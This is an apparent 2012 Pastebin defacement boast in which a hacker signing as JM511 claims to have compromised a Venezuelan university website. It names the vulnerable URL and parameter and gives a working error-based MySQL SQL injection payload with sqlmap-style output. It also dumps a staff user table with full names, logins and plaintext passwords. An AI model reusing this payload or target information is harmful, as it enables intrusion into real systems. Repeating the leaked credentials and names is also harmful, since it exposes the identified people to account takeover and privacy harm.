API tools faq
paste
Advertisement
Islam-Hacker

cip.una.edu.ve Hacked by JM511

Islam-Hacker
Sep 10th, 2012
225
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.28 KB | None | 0 0
raw download clone embed print report
  1. By @JM511
  2. Follow me: www.twitter.com/JM511
  3. We Are Saudi Arabian Hacker
  4. Don't Fuck With ME ;) Hackers From Venezuela ;)
  5. It's Cyber Warfare
  6. =========================
  7. Greeting to : All Muslims Hackers , In3ctor , Shi5-alHacker , Zombie_Hacker , Nok511 , Virus511 , ALM511 , M16
  8. =========================
  9.  
  10. http://cip.una.edu.ve/index.php?page=JM511< SQL Injection
  11.  
  12. Database: cip
  13. Table: usuarios
  14. [7 entries]
  15. +--------------+-----------+-------+---------------------+-----------+-------+
  16. | departamento | login | nivel | nombre | password | us_id |
  17. +--------------+-----------+-------+---------------------+-----------+-------+
  18. | CIIUNA | ymora | 1 | Yorgy Mora | ymora | 1 |
  19. | CIIUNA | ciiuna | 1 | Administrador | CiiUNAx9x | 43 |
  20. | CIP | nlopez | 1 | Norma Lopez | Nlopez975 | 44 |
  21. | CIP - Sec | wilmer | 1 | Wilmer Cede\f1o | wilmer | 45 |
  22. | CIP | licep | 1 | Licet Pachon | licep | 46 |
  23. | CIP | mcastillo | 1 | Maria Jose Castillo | m1234 | 48 |
  24. | CIIUNA | fcedeno | 1 | Franklyn Cede\f1o | fklyn | 49 |
  25. +--------------+-----------+-------+---------------------+-----------+-------+
  26.  
  27.  
  28. Database: cip
  29. [8 tables]
  30. +-------------+
  31. | contenido |
  32. | encuesta |
  33. | informacion |
  34. | menu |
  35. | noticias |
  36. | propiedades |
  37. | submenu |
  38. | usuarios |
  39. +-------------+
  40.  
  41.  
  42. Place: GET
  43. Parameter: page
  44. Type: error-based
  45. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  46. Payload: page=1' AND (SELECT 6268 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,117,98,58),(SELECT (CASE WHEN (6268=6268) THEN 1 ELSE 0 END)),CHAR(58,118,109,119,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'EWGH'='EWGH
  47. ---
  48.  
  49. [18:22:44] [INFO] the back-end DBMS is MySQL
  50. web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
  51. web application technology: PHP 5.3.3, Apache 2.2.16
  52. back-end DBMS: MySQL 5.0
  53. [18:22:44] [INFO] fetching database names
  54. [18:22:44] [INFO] the SQL query used returns 2 entries
  55. [18:22:45] [INFO] retrieved: information_schema
  56. [18:22:47] [INFO] retrieved: cip
  57. available databases [2]:
  58. [*] cip
  59. [*] information_schema
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!